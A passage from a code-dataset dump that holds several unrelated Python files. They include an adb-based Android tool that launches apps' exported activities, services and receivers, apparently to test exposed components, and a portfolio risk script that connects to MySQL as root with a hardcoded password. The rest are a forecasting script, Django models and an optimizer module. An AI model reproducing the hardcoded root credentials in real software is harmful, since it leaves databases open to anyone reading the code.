p.stdout.decode('gbk')\n else:\n try:\n ret['e'] = p.stderr.decode('utf-8')\n except:\n ret['e'] = p.stderr.decode('gbk')\n \n except subprocess.TimeoutExpired:\n ret['e'] = 'timeout'\n except Exception as e:\n logging.error('subprocess '+str(e))\n\n return ret\n\ndef getPkgList(pkg):\n if os.path.isfile(pkg):\n try:\n with open(pkg, 'r') as f:\n pkgs = f.read().split('\\n')\n except Exception as e:\n #logging.info(str(e))\n return []\n elif pkg:\n pkgs = pkg.split(',')\n out = []\n for p in pkgs:\n if p:\n out.append(p.strip())\n return out\n\ndef getChildNode(node):\n out = []\n if node.get('clickable') == 'true' or node.get('long-clickable') == 'true' or node.get('scrollable') == 'true' or (node.get('class') and node.get('class').startswith('android.widget.EditText')):\n out.append(node.attrib)\n \n if list(node):\n for child in node:\n out += getChildNode(child)\n\n return out\n \ndef parseUIDump(dumpfile):\n tree = ET.parse(dumpfile)\n root = tree.getroot()\n \n return getChildNode(root)\n\n\nclass AMonkey(object):\n def __init__(self, did):\n self._adb = 'adb'\n self._frida = 'frida -U '\n self._did = did\n self._devicepkg = []\n self._curdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '')\n self._dirapps = os.path.join(self._curdir, 'apps', '')\n self._dirappstmp = os.path.join(self._dirapps, 'tmp', '')\n self._dirinter = os.path.join(self._curdir, 'inter', '')\n self._androidver = ''\n self._blacklist = [\n 'com.android.settings',\n 'com.topjohnwu.magisk',\n 'com.speedsoftware.rootexplorer',\n 'org.proxydroid',\n 'android'\n ]\n\n self._init()\n \n def _init(self):\n if not self.checkOnline(self._did):\n sys.exit()\n if self._did:\n self._adb = 'adb -s '+self._did+' '\n self._devicepkg = self.getDevicePkgs()\n try:\n os.mkdir(self._dirapps)\n except:\n pass\n try:\n os.mkdir(self._dirappstmp)\n except:\n pass\n\n cmd = self._adb + ' shell \"mkdir /sdcard/monkeylogs\"'\n ret = execShell(cmd)\n cmd = self._adb + ' shell \"mkdir /sdcard/monkeyxmls\"'\n ret = execShell(cmd)\n\n def checkOnline(self, deviceid=''):\n devices = execShell('adb devices -l').get('d').split('\\n')\n ret = [d for d in devices if d.find('device ') != -1]\n dids = [d.split()[0] for d in ret]\n if deviceid:\n if deviceid in dids:\n return True\n else:\n logging.error('Device id error')\n logging.error(execShell('adb devices -l').get('d'))\n return False\n else:\n if len(dids) == 0:\n logging.error('No device')\n return False\n elif len(dids) == 1:\n return True\n elif len(dids) > 1:\n logging.error('More than one device, please set -s deviceid')\n return False\n\n def timeoutKIll(self, pkg, t):\n for i in range(t):\n time.sleep(1)\n cmd = self._adb + ' shell \"am force-stop '+pkg+' \" '\n execShell(cmd)\n\n def getDevicePkgs(self):\n ret = execShell(self._adb + ' shell pm list packages')\n pkgs = []\n if 'e' not in ret.keys():\n dt = ret.get('d').split('\\n')\n for p in dt:\n p = p.strip()\n if p:\n pkgs.append(p.split(':')[1])\n else:\n logging.error(ret.get('e'))\n return pkgs\n \n def pullXml(self, p):\n logging.info('==pull xml')\n\n if not self.setupBusybox():\n logging.error('busybox error')\n return\n\n sp = self._dirapps+p\n cmd = self._adb + ' shell \"pm path '+p+'\"'\n ret = execShell(cmd)\n if 'd' in ret.keys() and ret.get('d'):\n # multiple returns?\n apkpath = ret.get('d').split('\\n')[0].split(':')[1]\n cmd = self._adb + ' shell \"/data/local/tmp/busybox unzip -p '+apkpath+' AndroidManifest.xml > /sdcard/monkeyxmls/'+p+'\"'\n ret = execShell(cmd)\n\n cmd = self._adb + ' shell ls /sdcard/monkeyxmls/'+p\n ret = execShell(cmd)\n if 'No such file' in str(ret) :\n logging.error('xml unzip error')\n return\n \n cmd = self._adb + ' pull /sdcard/monkeyxmls/'+p+' '+sp\n ret = execShell(cmd)\n if 'd' in ret.keys():\n shutil.move(sp, sp+'.xml')\n return sp+'.xml'\n else:\n logging.error('pull error'+ret.get('e')+apkpath)\n else:\n logging.error('device has no '+p)\n \n def setupBusybox(self):\n cmd = self._adb + ' shell ls /data/local/tmp/busybox'\n ret = execShell(cmd)\n \n if 'No such file' in str(ret) :\n busybox = self._dirinter+'busybox'\n if not os.path.isfile(busybox):\n logging.error('please put busybox in dir \"inter\")')\n return False\n cmd = self._adb + ' push '+busybox+' /data/local/tmp/busybox'\n ret = execShell(cmd)\n if 'd' in ret.keys():\n logging.info('push busybox success')\n cmd = cmd = self._adb + ' shell \"chmod +x /data/local/tmp/busybox\" '\n ret = execShell(cmd)\n return True\n else:\n return False\n return True\n\n def killMonkey(self):\n logging.info('Clean monkey')\n cmd = self._adb + ' shell \"ps -A | grep com.android.commands.monkey\" '\n ret = execShell(cmd)\n if 'd' in ret.keys():\n data = ret.get('d').split('\\n')\n for d in data:\n tmp = d.split()\n if len(tmp) == 9 and tmp[8] == 'com.android.commands.monkey':\n cmd = self._adb + ' shell \"su -c \\' kill -9 '+tmp[1]+'\\' \"'\n ret = execShell(cmd)\n if 'e' in ret.keys():\n logging.info(ret.get('e'))\n\n logging.info('Clean monkey done')\n\n def getCurActivity(self):\n cmd = self._adb + ' shell \"dumpsys activity top | grep ACTIVITY \"'\n ret = execShell(cmd)\n out = ret.get('d')\n if out:\n out = out.split('\\n')\n out = out[-2]\n out = out.split()[1]\n ret = out\n if '/.' in out:\n ret = ret.replace('/', '')\n else:\n ret = ret.split('/')[1].strip()\n\n return ret\n\n def UIClick(self, p, a):\n if p not in self.getCurActivity():\n return\n #some phone may not work\n cmd = self._adb + ' shell \"/system/bin/uiautomator dump /sdcard/window_dump.xml \"'\n ret = execShell(cmd)\n curdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '')\n dumpfile = curdir+'/apps/tmp/uidump.xml'\n cmd = self._adb + ' pull /sdcard/window_dump.xml '+dumpfile\n ret = execShell(cmd)\n\n # clicks = parseUIDump(dumpfile)\n\n clicks = []\n \n for c in clicks:\n if p not in self.getCurActivity():\n break\n if c.get('class') and c.get('class').startswith('android.widget.EditText'):\n xy = c.get('bounds')\n xy = xy.split('][')[0]\n xy = xy.lstrip('[')\n x,y = xy.split(',')\n x = int(x) + 3\n y = int(y) + 3\n cmd = self._adb + ' shell \"input tap {} {}\"'.format(x, y)\n ret = execShell(cmd)\n cmd = self._adb + ' shell \"input text tex{}{}\"'.format(x, y)\n ret = execShell(cmd)\n logging.info('input '+c.get('resource-id'))\n \n elif c.get('clickable') == 'true':\n xy = c.get('bounds')\n xy = xy.split('][')[0]\n xy = xy.lstrip('[')\n x,y = xy.split(',')\n x = int(x) + 3\n y = int(y) + 3\n logging.info('click ({},{}) {}'.format(x, y, c.get('resource-id')))\n cmd = self._adb + ' shell \"input tap {} {}\"'.format(x, y)\n ret = execShell(cmd)\n time.sleep(1)\n if a not in self.getCurActivity():\n cmd = self._adb + ' shell \"input keyevent 4\"'\n ret = execShell(cmd)\n\n return clicks\n\n\n def monkey(self, pkg):\n pkgs = getPkgList(pkg)\n \n for p in pkgs:\n if p in self._blacklist:\n continue\n if p not in self._devicepkg:\n logging.error(p+' not installed')\n continue\n #检查设备在线\n if not self.checkOnline(self._did):\n logging.error('Device offline')\n return\n \n logging.info('=='+p)\n \n try:\n #准备apk文件\n sp = self._dirapps+p\n if os.path.isfile(sp+'.xml') and os.stat(sp+'.xml').st_size > 0:\n apkcook = APKCook(sp+'.xml', True)\n else:\n xmlpath = self.pullXml(p)\n if xmlpath:\n apkcook = APKCook(xmlpath, True)\n else:\n logging.error('xml error'+p)\n return\n \n activity = apkcook.show('ma').split(',')\n if len(activity) < 2:\n logging.info('maybe encrypted')\n\n #timeout kill\n timeout = 220\n timeoutThread = threading.Thread(target=self.timeoutKIll, args=(p, timeout), daemon=True)\n timeoutThread.start()\n\n cmd = self._adb + ' shell \"rm /sdcard/monkeylogs/'+p+'.log\"'\n ret = execShell(cmd)\n\n cmd = self._adb + ' shell \"logcat -c\"'\n ret = execShell(cmd)\n \n cmd = self._adb + ' shell \"logcat > /sdcard/monkeylogs/'+p+'.log.log\"'\n logcatdameon = execShellDaemon(cmd)\n\n UIcomponent = []\n\n for a in activity:\n if not a:\n continue\n logging.info(a)\n cmd = self._adb + ' shell \"am start -n '+p+'/'+a+'\"'\n #timeout not working, because connected to pipe??\n execShell(cmd)\n\n #monkey click\n # cmd = self._adb + ' shell \"monkey -p '+p+' -vvv --throttle 100 --pct-syskeys 0 --ignore-crashes 133 >> /sdcard/monkeylogs/'+p+'.log \" '\n # execShell(cmd, 40)\n\n #uiautomator dump\n time.sleep(1)\n self.UIClick(p, a)\n\n if not timeoutThread.is_alive():\n timeoutThread = threading.Thread(target=self.timeoutKIll, args=(p, timeout), daemon=True)\n timeoutThread.start()\n\n service = apkcook.show('ms').split(',')\n for s in service:\n if not s:\n continue\n logging.info(s)\n cmd = self._adb + ' shell \"am start-service '+p+'/'+s+' \" '\n execShell(cmd, 40)\n time.sleep(1)\n\n receiver = apkcook.show('mr').split(',')\n for s in receiver:\n if not s:\n continue\n logging.info(s)\n cmd = self._adb + ' shell \"am broadcast '+p+'/'+s+' \" '\n execShell(cmd, 40)\n time.sleep(1)\n\n if logcatdameon.poll():\n logcatdameon.terminate()\n\n \n except KeyboardInterrupt:\n cmd = self._adb + ' shell \"am force-stop '+p+' \" '\n ret = execShell(cmd)\n raise KeyboardInterrupt\n\n except Exception as e:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n\n # cmd = self._adb + ' shell \"am force-stop '+p+' \" '\n # ret = execShell(cmd)\n \n time.sleep(0.2)\n\ndef getExposed(pkg):\n from inter.apkcookpy.lib.apk import APKCook\n if os.path.isfile(pkg) and '.apk' in pkg:\n #apk\n try:\n APKCook(pkg).show()\n except Exception as e:\n logging.error(e)\n elif os.path.isfile(pkg) and '.xml' in pkg:\n #text xml\n try:\n APKCook(pkg, True, True).show()\n except:\n #binary xml\n try:\n APKCook(pkg, True).show()\n except Exception as e:\n logging.error(e)\n\n else:\n logging.error(\"python3 amonkey.py -e test.xml|test.apk\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Android Monkey', formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog='''\n python3 amonkey.py -p com.xiaomi.music[,com.xiaomi.youpin]\n python3 amonkey.py -p plist.txt\n python3 amonkey.py -e test.xml|test.apk\n ''')\n parser.add_argument(\"-p\", \"--pkg\", type=str, help=\"app/applist\")\n parser.add_argument(\"-e\", \"--exposed\", type=str, help=\"exposed component\")\n parser.add_argument(\"-s\", \"--did\", type=str, help=\"device ID\")\n \n args = parser.parse_args()\n pkg = args.pkg\n exposed = args.exposed\n did = args.did\n\n try:\n if pkg:\n amonkey = AMonkey(did)\n amonkey.monkey(pkg)\n \n elif exposed:\n getExposed(exposed)\n\n else:\n parser.print_help()\n except KeyboardInterrupt:\n logging.info('Ctrl+C')\n","sub_path":"amonkey.py","file_name":"amonkey.py","file_ext":"py","file_size_in_byte":15001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"287134505","text":"# from selenium import webdriver\n# from bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport numpy as np\nimport pymysql\nimport datetime\n# from selenium.webdriver.chrome.options import Options\nimport math\nimport sys\nimport statistics\n# etf = ['VTI','VOO','VXUS','SPY','BND','IVV','BNDX','VEA','VO',\n# 'VUG','VB','VWO','VTV','QQQ','BSV','BIV','VTIP','VOE','IEF',\n# 'SHY','TLT','IVE','VT','GOVT']\n\n\n\n\n\n\ntemp = 'SPY,IVV,VTI,VOO,QQQ,AGG,GLD,VEA,IEFA,BND,VWO,VUG,IWF,LQD,IEMG,VTV,EFA,VIG,IJH,IJR,IWM,VCIT,IWD,VGT,XLK,VO,USMV,IAU,VCSH,BNDX,IVW,HYG,VNQ,VB,ITOT,VYM,BSV,VXUS,VEU,EEM,XLV,TIP,IWB,DIA,SCHX,MBB,IXUS,SHY,SHV,IWR,IGSB,IEF,SCHF,QUAL,VV,GDX,XLF,MUB,TLT,PFF,EMB,IVE,SCHB,XLY,SDY,SLV,GOVT,MDY,BIV,XLP,VT,BIL,JPST,MINT,VBR,RSP,JNK,DVY,IWP,SCHD,VGK,ACWI,SCHP,SCHG,XLI,XLU,DGRO,VMBS,VHT,MTUM,IGIB,IEI,VBK,EFAV,XLC,IWS,GSLC,EWJ,FDN,SCHA'\ntemp_arr = temp.split(',')\netf = []\nfor i in range(100):\n etf.append(temp_arr[i])\n\ntemp = 'KO,PLD,CSX,MMC,AAPL,MSFT,AMZN,FB,GOOGL,GOOG,JNJ,V,PG,NVDA,JPM,HD,MA,UNH,VZ,DIS,ADBE,CRM,PYPL,MRK,NFLX,INTC,T,CMCSA,PFE,BAC,WMT,PEP,ABT,TMO,CSCO,MCD,ABBV,XOM,ACN,COST,NKE,AMGN,AVGO,CVX,MDT,NEE,BMY,UNP,LIN,DHR,QCOM,PM,TXN,LLY,LOW,ORCL,HON,UPS,AMT,IBM,SBUX,C,LMT,MMM,WFC,CHTR,RTX,AMD,FIS,BA,NOW,SPGI,BLK,ISRG,GILD,CAT,MDLZ,INTU,MO,ZTS,CVS,TGT,BKNG,AXP,BDX,VRTX,DE,D,ANTM,EQIX,CCI,APD,SYK,CL,TMUS,CI,GS,DUK,MS,ATVI'\ntemp_arr = temp.split(',')\nstk = []\nfor i in range(100):\n stk.append(temp_arr[i])\n\netf = stk + etf\n\nchoose1 = sys.argv[1]\nweight1 = sys.argv[2]\nchoose = choose1.split(',')\nweight = weight1.split(',')\nfor i in range(len(weight)):\n weight[i] = float(weight[i])\n\n\ndate1 = int(sys.argv[3])\ndate2 = int(sys.argv[4])\ndate3 = int(sys.argv[5])\n\ntoday = datetime.date(date3,date2,date1)\n\n# today = datetime.date(2020, 8, 16)\n# choose = ['BKNG','SCHP','XLP','SBUX','PG','VZ']\n# weight = [0.16667,0.16667, 0.16667, 0.16667, 0.16667, 0.16667]\n\n# days = [30,90,365]\ndays = [21,63,252]\n\nstddevs = np.zeros(4)\nsharpes = np.zeros(4)\n# print(MDD)\n\ndb = pymysql.connect(\"localhost\", \"root\", \"esfortest\", \"etf\")\ncursor = db.cursor()\n\nsql = \"select * from close\"\ncursor.execute(sql)\nresult_select = cursor.fetchall()\ndb.commit()\ndf = pd.DataFrame(list(result_select))\n# df = df.drop([0],axis=1)\n\n\nfor a in range(len(etf)):\n df = df.rename(columns={a+1:etf[a]})\n# print(df)\n\nfor a in range(-1,len(choose)):\n if a==-1:\n df2 = df[0]\n else:\n df2 = pd.concat([df2, df[choose[a]] ],axis=1)\n# print(df2)\n\ni=0\nwhile(True):\n have_nan = True\n for a in range(len(choose)):\n if np.isnan(df2[choose[a]][i])==True: #是空的\n have_nan = False\n break\n if have_nan==False:\n df2 = df2.drop([i],axis=0)\n i+=1\n else:\n break\n\n# print(df2)\ndf2 = df2.reset_index(drop=True)\n\n\n\ntodayyy = today\n# todayyy = datetime.date(2020, 8, 16)\ndf2 = df2.reset_index(drop=True)\n# print(df2)\nwhile (todayyy in list(df2[0]))==False and ( datetime.datetime.strptime(str(todayyy),\"%Y-%m-%d\")>datetime.datetime.strptime(str(df2[0][0]),\"%Y-%m-%d\") ):\n todayyy -= datetime.timedelta(days=1)\n# print(start_date)\nif (todayyy in list(df2[0]))==True:\n todayyy_index = list(df2[0]).index(todayyy) \nelse:\n todayyy_index = 0\ndf2 = df2[:todayyy_index+1]\ndf2 = df2.reset_index(drop=True)\n\n\n# 平均股價\ndf2['avg'] = 0\n# df2 = df2.drop(['avg'],axis=1)\nfor i in range(len(df2['avg'])):\n for a in range(len(choose)):\n df2.loc[i,'avg'] += df2[choose[a]][i]*weight[a]\n# print(df2)\n\n# 漲幅\ndf2['day_return'] = 0 \nfor i in range(len(df2)-1):\n df2.loc[i+1,'day_return'] = (df2['avg'][i+1] - df2['avg'][i])/df2['avg'][i]\n# print(df2)\ndf2 = df2.fillna(0)\n# 無風險利率\nrisk_free_return = 0.01/365\n# risk_free_return = 0\n\navg_return = statistics.mean(df2['day_return'])\n# print(avg_return)\n\n# 標準差\n\n\n# print(df2.isnull().sum())\n# print(statistics.stdev(df2['day_return']))\nstd_dev = statistics.stdev(df2['day_return'][1:])* math.sqrt(252)\n# print(std_dev)#0.1757400215841394\nstddevs[3]=std_dev*100\n\n# 夏普值\nsharpe = (avg_return-risk_free_return) / std_dev * math.sqrt(252)\n# sharpe = (avg_return) / std_dev * math.sqrt(252)\n# print(sharpe)#0.5267990017907497\nsharpes[3]=sharpe\n\ni=0\nfor d in days:\n df3 = df2[d*(-1):]\n df3 = df3.reset_index(drop=True)\n std_dev = statistics.stdev(df3['day_return'][1:])* math.sqrt(252)\n sharpe = (avg_return-risk_free_return) / std_dev * math.sqrt(252)\n stddevs[i]=std_dev*100 \n sharpes[i]=sharpe \n i+=1\n # print(std_dev)\n # print(sharpe)\n # print()\nstddevs2 = np.zeros(5)\nd2 = [63,126,252,204,756]\ni=0\nfor d in d2:\n df3 = df2[d*(-1):]\n df3 = df3.reset_index(drop=True)\n std_dev = statistics.stdev(df3['day_return'][1:])* math.sqrt(252)\n # sharpe = (avg_return-risk_free_return) / std_dev * math.sqrt(252)\n stddevs2[i]=std_dev*100 \n # sharpes[i]=sharpe \n i+=1\n\n# 最大回徹率\nmdds=[]\nfor d in days:\n df3 = df2[d*(-1):]\n df3 = df3.reset_index(drop=True)\n df3['avg'] = 0\n for i in range(len(df3['avg'])):\n for a in range(len(choose)):\n df3.loc[i,'avg'] += df3[choose[a]][i]*weight[a]\n df3['max']=0\n s1 = df3['avg']\n for i in range(len(df3)):\n df3.loc[i,'max'] = s1[0:i+1].max() \n\n df3['dd'] = 0\n df3['dd'] = 1-(df3['avg']/df3['max'])\n\n mdd = df3['dd'].max()\n mdds.append(mdd)\n # print(mdd)\n\ndf2['max']=0\ns1 = df2['avg']\nfor i in range(len(df2)):\n df2.loc[i,'max'] = s1[0:i+1].max() \n\ndf2['dd'] = 0\ndf2['dd'] = 1-(df2['avg']/df2['max'])\n\nmdd = df2['dd'].max()\n# print(mdd)\nmdds.append(mdd)\n\n\n# print(mdds)#[0.014878441598282222, 0.08107850063969146, 0.3632447312443021, 0.3632447312443021]\n# print(stddevs)#[ 9.16611393 21.14502543 28.76564975 17.57400216]\n# print(sharpes)#[0.06835749 0.02963215 0.02178197 0.03565338]\n\nr1=[]\nr2=[]\nr3=[]\nr4=[]\nfor i in range(4):\n r1.append(format(mdds[i] , '0.5f'))\n r2.append(format(stddevs[i] , '0.3f'))\n r3.append(format(sharpes[i] , '0.5f'))\nfor i in range(5):\n r4.append(format(stddevs2[i] , '0.3f'))\n\nresult1=' '.join(r1)\nresult2=' '.join(r2)\nresult3=' '.join(r3)\nresult4=' '.join(r4)\nprint(result1)\nprint(result2)\nprint(result3)\nprint(result4)","sub_path":"functions/risk_analysis.py","file_name":"risk_analysis.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614693916","text":"\n\n#calss header\nclass _DOMICILED():\n\tdef __init__(self,): \n\t\tself.name = \"DOMICILED\"\n\t\tself.definitions = [u'being legally resident (= living) in a place: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_domiciled.py","file_name":"_domiciled.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"571848368","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import mean_absolute_error\nimport datetime\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef percentage_error(actual, predicted):\n res = np.empty(actual.shape)\n for j in range(actual.shape[0]):\n if actual[j] != 0:\n res[j] = (actual[j] - predicted[j]) / actual[j]\n else:\n res[j] = predicted[j] / np.mean(actual)\n return res\n\ndef mean_absolute_percentage_error(y_true, y_pred): \n return np.mean(np.abs(percentage_error(np.asarray(y_true), np.asarray(y_pred)))) * 100\n\ndataset = pd.read_csv(r\"C:\\Users\\djsam\\Desktop\\ML\\Dataset\\covid19.csv\")\nX = list(dataset.columns)\nX = X[4:] #days\ny = dataset.iloc[131:132,4:].values #Confimed Patients\n\nX = np.array(X)\nX = X.astype(int)\nX = np.reshape(X,(-1, 1))\ny = np.reshape(y,(-1, 1)) #Converted y to appropriate form - y.transpose()\n\n# for i in range(len(y)):\n# if y[i,0] == 0:\n# y[i,0] = 1\n\nmodel = ExponentialSmoothing(y,trend=\"add\",damped = True, seasonal = None)\nmodel_fit = model.fit(0.3,0.1)\nyhat = model_fit.predict(start = 1, end = len(y))\nyhat = np.reshape(yhat,(-1, 1))\n\n# gsc = GridSearchCV(ExponentialSmoothing(y,trend=\"add\",damped = True, seasonal = None),\n# {\"trend\" : [\"add\", \"mul\", \"additive\", \"multiplicative\"],\n# \"damped\": [True,False]},\n# cv=5, scoring='neg_mean_squared_error', verbose=0, n_jobs=-1)\n\n# grid_result = gsc.fit(X,y.ravel())\n# best_params = grid_result.best_params_\n\nmodel = ExponentialSmoothing(y,trend=\"add\",damped = True, seasonal = None)\nmodel_fit = model.fit(0.3,0.1)\nyhat1 = model_fit.predict(start = 1, end = len(y)+10)\nyhat1 = np.reshape(yhat1,(-1, 1))\n\nprint(f\"RMSE = {mean_squared_error(y,yhat,squared = False)}\")\nprint(f\"MSE = {mean_squared_error(y,yhat,squared = True)}\")\nprint(f\"MAE = {mean_absolute_error(y,yhat)}\")\nprint(f\"MAPE = {mean_absolute_percentage_error(y,yhat)} \")\n\ndates = []\nfor i in range(len(yhat)):\n dates.append(datetime.date(2020,1,22) + datetime.timedelta(i))\n\ndates10ahead = []\nfor i in range(len(yhat)+10):\n dates10ahead.append(datetime.date(2020,1,22) + datetime.timedelta(i))\n","sub_path":"Ensemble/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633706659","text":"from django.db import models\nfrom django.forms import ModelForm\n\nfrom django.template.defaultfilters import slugify\n\nclass Page(models.Model): #Architecture pour les pages static et dynamique\n p_titre = models.CharField(\"Titre\", max_length = 128, unique =True)\n p_titre_slugify = models.CharField(\"Titre Slugify\", max_length = 128, blank = True, editable = False)\n p_adresse = models.CharField(\"Adresse\", max_length =64)\n p_mots_clefs = models.CharField(\"Mots clés\", max_length = 512, blank = True)\n p_description = models.TextField(\"Description\")\n p_contenu = models.TextField(\"Contenu\")\n p_bouillon = models.BooleanField(\"Bouillon\", default = True)\n \n class Meta:\n verbose_name = 'Gestion des pages'\n verbose_name_plural = 'Gestion des pages'\n ordering = ['p_adresse']\n \n def save(self, *args, **kwargs):\n self.p_titre_slugify = slugify(self.p_titre)\n super(Page, self).save(*args, **kwargs)\n \n def __unicode__(self):\n return self.p_titre\n def __str__(self):\n return '%s' % (self.p_titre)\n\nclass Contact(models.Model):\n \n c_name = models.CharField(\"Nom du foyer\", max_length = 128)\n c_nbPersonnes = models.IntegerField(\"Nombre de personnes\")\n c_nomsPersonnes = models.CharField(\"Noms des personnes\", max_length = 128)\n c_email = models.EmailField(\"Votre email\")\n c_mdp = models.CharField(\"Tapez votre mot de passe\", max_length = 128)\n c_numTel = models.CharField(\"Numéro de téléphone\", max_length = 128)\n c_adresse = models.CharField(\"Adresse\", max_length = 128)\n c_codepostal = models.CharField(\"Code postal\", max_length = 128)\n c_ville = models.CharField(\"Ville\", max_length = 128)\n c_pays = models.CharField(\"Pays\", max_length = 128)\n \n def __unicode__(self):\n return self.c_name\n def __str__(self):\n return '%s' % (self.c_name)\n \n \nclass ContactForm(ModelForm): #Formulaire de contact lié au model\n class Meta:\n model = Contact\n fields = ['c_name','c_nbPersonnes','c_nomsPersonnes', 'c_email','c_mdp','c_numTel','c_adresse','c_codepostal','c_ville','c_pays']\n\nclass Articles(models.Model):\n a_statut_liste=(\n ('1','1 pers'),\n ('2','2 pers'),\n ('3','3 pers'),\n ('4','4 pers'),\n ('5','5 pers'),\n ('6','6 pers'),\n ('7','7 pers'),\n ('8','8 pers'),\n ('9','9 pers'),\n \n )\n a_type_liste=(\n ('1','1 portion'),\n ('2','2 portions'),\n ('3','3 portions'),\n ('4','4 portions'),\n ('5','5 portions'),\n ('6','6 portions'),\n ('7','7 portions'),\n ('8','8 portions'),\n ('9','9 portion'),\n )\n \n # alimentaire\n a_statut=models.CharField(\"Nombre de personne foyer\", max_length=16,choices=a_statut_liste,default='1')\n a_type=models.CharField(\"Portion de riz souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type2=models.CharField(\"Portion de pates souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type3=models.CharField(\"Portion de viande souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type4=models.CharField(\"Portion de boeuf souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type5=models.CharField(\"Portion de crevette souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type6=models.CharField(\"Nombre de gel hydroalcoolique souhaité\", max_length=16,choices=a_type_liste,default='1')\n a_type7=models.CharField(\"Portion de Jambon souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type10=models.CharField(\"Nombre de bouteille de lait souhaité\", max_length=16,choices=a_type_liste,default='1')\n a_type11=models.CharField(\"Nombre de masque souhaité\", max_length=16,choices=a_type_liste,default='1')\n a_type12=models.CharField(\"Nombre de boite d'oeuf souhaité\", max_length=16,choices=a_type_liste,default='1')\n a_type13=models.CharField(\"Portion de pomme de terre souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type14=models.CharField(\"Portion de poulet souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type15=models.CharField(\"Portion de tomate souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type17=models.CharField(\"Portion de sucre souhaitée\", max_length=16,choices=a_type_liste,default='1')\n a_type18=models.CharField(\"Nombre de pack de farine souhaitée\", max_length=10,choices=a_type_liste,default='1')\n a_type19=models.CharField(\"Nombre de boite de thon souhaité\", max_length=10,choices=a_type_liste,default='1')\n \n # hygiène\n a_type21=models.CharField(\"Nombre de pack de couches pour bébé souhaité\", max_length=10,choices=a_type_liste,default='1')\n a_type22=models.CharField(\"Nombre de tube de dentifrice souhaité\", max_length=10,choices=a_type_liste,default='1')\n a_type23=models.CharField(\"Nombre de pack de papier toilette souhaité\", max_length=10,choices=a_type_liste,default='1')\n a_type24=models.CharField(\"Nombre de savon pour les mains souhaité\", max_length=10,choices=a_type_liste,default='1')\n a_type25=models.CharField(\"Nombre de tube de shampoing souhaité\", max_length=10,choices=a_type_liste,default='1')\n a_description=models.TextField(\"un produit à suggérer\")\n \n def __unicode__(self):\n return self.c_name\n def __str__(self):\n return '%s' % (self.c_name)\n \nclass ArticlesForm(ModelForm): #Formulaire de contact lié au model\n class Meta:\n model = Articles\n fields = ['a_statut','a_type','a_type2', 'a_type3','a_type4','a_type5','a_type6','a_type7','a_type10','a_type11','a_type12','a_type13','a_type14','a_type15','a_type17','a_type18','a_type19','a_type21','a_type22','a_type23','a_type24','a_type25','a_description']","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197367367","text":"import numpy as np\n\nclass UpdateStrategy:\n @classmethod\n def create(cls, setting):\n name = setting.get('name')\n kwargs = setting.get('setting') or {}\n if name == 'momentum':\n return Momentum(**kwargs)\n if name in [\"rmsprop\", \"rms\"]:\n return RMSProp(**kwargs)\n if name == 'adagrad':\n return Adagrad(**kwargs)\n if name == 'adadelta':\n return AdaDelta(**kwargs)\n if name == 'adam':\n return Adam(**kwargs)\n if name == 'plain':\n return UpdateStrategy(**kwargs)\n # if name in ['nesterov_accelerated_gradient', 'nesterov_ag', 'nag']:\n # return NesterovAcceleratedGradient()\n return UpdateStrategy(**kwargs)\n @classmethod\n def list_up(cls):\n return [\n 'momentum',\n # 'nag',\n Adagrad(epsilon = 0.25),\n 'rms',\n 'adadelta',\n 'adam',\n ]\n\n def __init__(self, \n *,\n learn_rate = 0.125,\n **__\n ):\n # 勾配クリッピング。更新量絶対値のmax\n self.grad_clipping = 0.5\n self.learn_rate = learn_rate\n def calc(self, diff):\n self.last_learn = diff\n def update(self):\n return self.clip(-self.learn_rate * self.last_learn)\n def clip(self, grad):\n clp = self.grad_clipping\n return np.clip(grad, -clp, clp)\n\nclass Momentum(UpdateStrategy):\n #rateはモーメンタム係数momentum coefficientのことだが名前が長すぎるので\n def __init__(self, *, learn_rate = 0.125, rate = None, **kwargs):\n super(Momentum, self).__init__(**kwargs)\n self.last_moment = None\n self.learn_rate = learn_rate\n self.rate = rate or 0.05\n def update(self):\n upd = -self.learn_rate * self.last_learn\n moment = self.last_moment if self.last_moment is not None else 0\n self.last_moment = self.clip(self.rate * moment + upd)\n return self.last_moment\n\n\nclass RMSProp(UpdateStrategy):\n def __init__(self,\n *,\n learn_rate = 0.125,\n epsilon = 0.1,\n attenuation_rate = 0.9, #減衰率\n **kwargs,\n ):\n super(RMSProp, self).__init__(**kwargs)\n self.last_ada = 0\n self.learn_rate = learn_rate\n self.attn = attenuation_rate or 0.9\n self.epsilon = epsilon or 0.1 #どれぐらいがいいのかさっぱりわからん\n def 